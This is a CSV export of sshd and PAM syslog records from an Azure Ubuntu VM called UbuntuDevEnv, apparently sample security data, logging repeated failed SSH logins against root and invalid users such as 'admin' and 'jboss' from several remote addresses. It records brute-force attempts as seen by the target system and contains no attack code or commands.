+14991,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:59,UbuntuDevEnv,2019-06-26 05:12:58,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,6958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14992,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:12:59,UbuntuDevEnv,2019-06-26 05:12:58,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 37017 ssh2],6958,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,37017,,
+14993,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:02,UbuntuDevEnv,2019-06-26 05:13:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+14994,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:04,UbuntuDevEnv,2019-06-26 05:13:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 44807 ssh2,7032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44807,,
+14995,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:19,UbuntuDevEnv,2019-06-26 05:13:18,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 44807: Too many authentication failures [preauth],7032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,44807,,
+14996,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:19,UbuntuDevEnv,2019-06-26 05:13:18,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+14997,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:19,UbuntuDevEnv,2019-06-26 05:13:18,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 44807 ssh2],7032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44807,,
+14998,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:19,UbuntuDevEnv,2019-06-26 05:13:18,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 44807 ssh2 [preauth],7032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,44807,,
+14999,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:19,UbuntuDevEnv,2019-06-26 05:13:18,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7032,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15000,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:21,UbuntuDevEnv,2019-06-26 05:13:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15001,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:23,UbuntuDevEnv,2019-06-26 05:13:23,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 52541 ssh2,7106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52541,,
+15002,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:37,UbuntuDevEnv,2019-06-26 05:13:36,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 52541 ssh2],7106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52541,,
+15003,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:37,UbuntuDevEnv,2019-06-26 05:13:36,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 52541: Too many authentication failures [preauth],7106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,52541,,
+15004,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:37,UbuntuDevEnv,2019-06-26 05:13:36,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15005,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:37,UbuntuDevEnv,2019-06-26 05:13:36,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15006,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:37,UbuntuDevEnv,2019-06-26 05:13:36,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 52541 ssh2 [preauth],7106,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,52541,,
+15007,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:40,UbuntuDevEnv,2019-06-26 05:13:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15008,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:42,UbuntuDevEnv,2019-06-26 05:13:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 59948 ssh2,7172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,59948,,
+15009,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:47,UbuntuDevEnv,2019-06-26 05:13:44,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 59948 ssh2,7172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,59948,,
+15010,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:48,UbuntuDevEnv,2019-06-26 05:13:47,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 59948 ssh2,7172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,59948,,
+15011,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:56,UbuntuDevEnv,2019-06-26 05:13:55,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 59948 ssh2],7172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,59948,,
+15012,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:56,UbuntuDevEnv,2019-06-26 05:13:55,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 59948: Too many authentication failures [preauth],7172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,59948,,
+15013,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:56,UbuntuDevEnv,2019-06-26 05:13:55,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 59948 ssh2 [preauth],7172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,59948,,
+15014,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:56,UbuntuDevEnv,2019-06-26 05:13:55,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15015,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:56,UbuntuDevEnv,2019-06-26 05:13:55,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7172,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15016,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:13:59,UbuntuDevEnv,2019-06-26 05:13:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15017,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:01,UbuntuDevEnv,2019-06-26 05:14:01,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3160 ssh2,7244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3160,,
+15018,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:04,UbuntuDevEnv,2019-06-26 05:14:04,auth,UbuntuDevEnv,info,Invalid user admin from 200.6.188.38 port 7853,7264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,200.6.188.3,7853,,
+15019,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:04,UbuntuDevEnv,2019-06-26 05:14:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.6.188.38,7264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.6.188.3,,0,
+15020,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:04,UbuntuDevEnv,2019-06-26 05:14:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15021,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:04,UbuntuDevEnv,2019-06-26 05:14:04,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3160 ssh2,7244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3160,,
+15022,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:06,UbuntuDevEnv,2019-06-26 05:14:06,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 200.6.188.38 port 7853 ssh2,7264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,200.6.188.3,7853,,
+15023,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:06,UbuntuDevEnv,2019-06-26 05:14:06,auth,UbuntuDevEnv,info,Received disconnect from 200.6.188.38 port 7853:11: Bye Bye [preauth],7264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.6.188.3,7853,,
+15024,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:06,UbuntuDevEnv,2019-06-26 05:14:06,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 200.6.188.38 port 7853 [preauth],7264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,200.6.188.3,7853,,
+15025,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:07,UbuntuDevEnv,2019-06-26 05:14:06,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 3160 ssh2,7244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3160,,
+15026,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:17,UbuntuDevEnv,2019-06-26 05:14:16,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15027,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:17,UbuntuDevEnv,2019-06-26 05:14:16,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 3160 ssh2 [preauth],7244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3160,,
+15028,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:17,UbuntuDevEnv,2019-06-26 05:14:16,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 3160: Too many authentication failures [preauth],7244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,3160,,
+15029,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:17,UbuntuDevEnv,2019-06-26 05:14:16,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 3160 ssh2],7244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,3160,,
+15030,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:17,UbuntuDevEnv,2019-06-26 05:14:16,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7244,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15031,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:20,UbuntuDevEnv,2019-06-26 05:14:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15032,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:22,UbuntuDevEnv,2019-06-26 05:14:21,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 11285 ssh2,7323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11285,,
+15033,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:37,UbuntuDevEnv,2019-06-26 05:14:37,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 11285: Too many authentication failures [preauth],7323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,11285,,
+15034,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:37,UbuntuDevEnv,2019-06-26 05:14:37,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15035,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:37,UbuntuDevEnv,2019-06-26 05:14:37,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15036,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:37,UbuntuDevEnv,2019-06-26 05:14:37,auth,UbuntuDevEnv,info,message repeated 5 times: [ Failed password for root from 58.242.82.13 port 11285 ssh2],7323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11285,,
+15037,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:37,UbuntuDevEnv,2019-06-26 05:14:37,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 11285 ssh2 [preauth],7323,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,11285,,
+15038,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:40,UbuntuDevEnv,2019-06-26 05:14:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15039,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:42,UbuntuDevEnv,2019-06-26 05:14:42,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 19499 ssh2,7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19499,,
+15040,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:47,UbuntuDevEnv,2019-06-26 05:14:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 19499 ssh2,7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19499,,
+15041,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:48,UbuntuDevEnv,2019-06-26 05:14:48,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 19499 ssh2,7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19499,,
+15042,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:49,UbuntuDevEnv,2019-06-26 05:14:48,auth,UbuntuDevEnv,info,Connection closed by 140.143.223.242 port 40014 [preauth],7409,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,40014,,
+15043,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:51,UbuntuDevEnv,2019-06-26 05:14:50,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 19499 ssh2,7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19499,,
+15044,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:56,UbuntuDevEnv,2019-06-26 05:14:55,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15045,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:56,UbuntuDevEnv,2019-06-26 05:14:55,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 19499 ssh2],7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19499,,
+15046,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:56,UbuntuDevEnv,2019-06-26 05:14:55,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 19499: Too many authentication failures [preauth],7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,19499,,
+15047,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:56,UbuntuDevEnv,2019-06-26 05:14:55,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 19499 ssh2 [preauth],7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,19499,,
+15048,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:56,UbuntuDevEnv,2019-06-26 05:14:55,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,7394,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15049,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:14:57,UbuntuDevEnv,2019-06-26 05:14:57,auth,UbuntuDevEnv,info,Invalid user jboss from 196.41.208.238 port 44076,7456,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,jboss,196.41.208.2,44076,,
